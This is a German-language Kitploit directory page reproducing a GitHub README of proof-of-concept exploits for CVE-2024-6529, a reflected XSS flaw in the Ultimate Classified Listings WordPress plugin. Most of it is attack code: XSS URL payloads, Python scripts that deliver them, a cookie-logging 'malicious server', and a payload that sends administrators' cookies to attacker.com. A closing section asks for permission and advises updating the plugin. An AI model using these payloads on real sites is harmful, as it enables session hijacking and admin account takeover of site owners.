Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-6529 — Proof-of-Concept-Skripte, die reflektiertes XSS im Ultimate Classified Listings WordPress-Plugin und Admin-Cookie-Diebstahl über manipulierte Payloads und einen Logging-Server demonstrieren. | Kitploit
Tools/GitHubGitHub/abdurahmon3236/cve-2024-6529
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPhishingPenetrationstestsSocial Engineering
GitHubabdurahmon3236/cve-2024-6529

CVE-2024-6529

Proof-of-Concept-Skripte, die reflektiertes XSS im Ultimate Classified Listings WordPress-Plugin und Admin-Cookie-Diebstahl über manipulierte Payloads und einen Logging-Server demonstrieren.

Repository anzeigen
6vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Proof of Concept (PoC) für Schwachstellen in WordPress-Plugins

Dieses Repository enthält Proof-of-Concept-Skripte (PoC) für verschiedene Schwachstellen, die in unterschiedlichen WordPress-Plugins entdeckt wurden. Diese Skripte zeigen, wie Angreifer diese Schwachstellen ausnutzen können, um schädliche Aktionen durchzuführen.

Inhaltsverzeichnis

  • Abgedeckte Schwachstellen
  • Einrichtung und Verwendung
    • Reflektiertes XSS im Ultimate Classified Listings Plugin
    • Cookie-Diebstahl mittels XSS
  • Wichtige Überlegungen

Abgedeckte Schwachstellen

  1. Reflektiertes Cross-Site Scripting (XSS) im Ultimate Classified Listings Plugin

    • Eine Schwachstelle im Ultimate Classified Listings WordPress-Plugin vor Version 1.4 ermöglicht es Angreifern, beliebiges JavaScript auszuführen, indem sie bösartige Skripte durch unsanitisierte Parameter injizieren.
  2. Cookie-Diebstahl mittels XSS

    • Zeigt, wie ein Angreifer die reflektierte XSS-Schwachstelle ausnutzen kann, um Cookies von Benutzern mit hohen Privilegien, wie z.B. Administratoren, zu stehlen, indem die Cookies an einen bösartigen Server gesendet werden.

Einrichtung und Verwendung

Reflektiertes XSS im Ultimate Classified Listings Plugin

Dieses PoC zeigt, wie die reflektierte XSS-Schwachstelle im Ultimate Classified Listings Plugin ausgenutzt werden kann.

  1. Identifiziere den anfälligen Parameter:

    • Nehmen wir an, der anfällige Parameter ist search in der URL http://example.com/classifieds.
  2. Erstelle eine bösartige URL:

    • Die bösartige URL kann einen Payload enthalten, um einen Alert-Dialog auszuführen:
      root@kitploit:~
      http://example.com/classifieds?search=<script>alert('XSS')</script>
      
  3. Führe das PoC-Skript aus:

    • Speichere das folgende Skript als xss_poc.py und führe es aus.
    root@kitploit:~
    import requests
    
    # Configuration
    target_url = "http://example.com/classifieds"  # Change this to the target site's URL
    payload = "<script>alert('XSS')</script>"  # XSS payload
    
    def trigger_xss():
        # Construct the malicious URL
        malicious_url = f"{target_url}?search={payload}"
    
        # Send a GET request to the malicious URL
        response = requests.get(malicious_url)
    
        # Check if the payload is reflected in the response
        if payload in response.text:
            print("[+] XSS payload reflected in the response.")
            print("[+] Malicious URL:", malicious_url)
        else:
            print("[-] XSS payload not reflected in the response.")
    
    if __name__ == "__main__":
        trigger_xss()
    

Cookie-Diebstahl mittels XSS

Dieses PoC zeigt, wie ein Angreifer die reflektierte XSS-Schwachstelle ausnutzen kann, um Cookies von Benutzern mit hohen Privilegien zu stehlen.

  1. Richte einen bösartigen Server ein:

    • Speichere das folgende Skript als malicious_server.py und führe es aus, um einen Server zu starten, der eingehende Anfragen (einschließlich Cookies) protokolliert.
    root@kitploit:~
    from http.server import BaseHTTPRequestHandler, HTTPServer
    import logging
    
    class RequestHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            logging.info(f"Received request: {self.headers}")
            self.send_response(200)
            self.end_headers()
    
    def run(server_class=HTTPServer, handler_class=RequestHandler, port=8080):
        logging.basicConfig(filename='server.log', level=logging.INFO)
        server_address = ('', port)
        httpd = server_class(server_address, handler_class)
        logging.info(f'Starting server on port {port}...')
        httpd.serve_forever()
    
    if __name__ == "__main__":
        run()
    
  2. Erstelle einen Payload zum Stehlen von Cookies:

    • Erstelle einen Payload, der die Cookies des Administrators an den bösartigen Server sendet:
      root@kitploit:~
      http://example.com/classifieds?search=<script>new Image().src='http://attacker.com:8080?cookie='+document.cookie;</script>
      
  3. Führe das PoC-Skript aus:

    • Speichere das folgende Skript als steal_cookies_poc.py und führe es aus.
    root@kitploit:~
    import requests
    
    # Configuration
    target_url = "http://example.com/classifieds"  # Change this to the target site's URL
    attacker_server = "http://attacker.com:8080"  # Change this to your malicious server's URL
    payload = f"<script>new Image().src='{attacker_server}?cookie='+document.cookie;</script>"
    
    def trigger_xss():
        # Construct the malicious URL
        malicious_url = f"{target_url}?search={payload}"
    
        # Send a GET request to the malicious URL
        response = requests.get(malicious_url)
    
        # Check if the payload is reflected in the response
        if payload in response.text:
            print("[+] XSS payload reflected in the response.")
            print("[+] Malicious URL:", malicious_url)
        else:
            print("[-] XSS payload not reflected in the response.")
    
    if __name__ == "__main__":
        trigger_xss()
    

Wichtige Überlegungen

  • Berechtigungen: Stelle sicher, dass du die ausdrückliche Erlaubnis hast, diese Schwachstellen auf der Zielseite zu testen. Unautorisierter Zugriff ist illegal und unethisch.
  • Testumgebung: Führe diese Tests in einer kontrollierten Umgebung durch, um Auswirkungen auf Produktionssysteme zu vermeiden.
  • Gegenmaßnahmen: Aktualisiere das Ultimate Classified Listings Plugin auf Version 1.4 oder höher. Bereinige und maskiere Benutzereingaben stets, bevor sie in die Ausgabe aufgenommen werden.

Diese PoCs zeigen, wie ein Angreifer Schwachstellen in WordPress-Plugins ausnutzen kann, um schädliche Aktionen durchzuführen. Halte deine Software stets auf dem neuesten Stand und befolge die besten Sicherheitspraktiken, um solche Schwachstellen zu vermeiden.

Tool herunterladen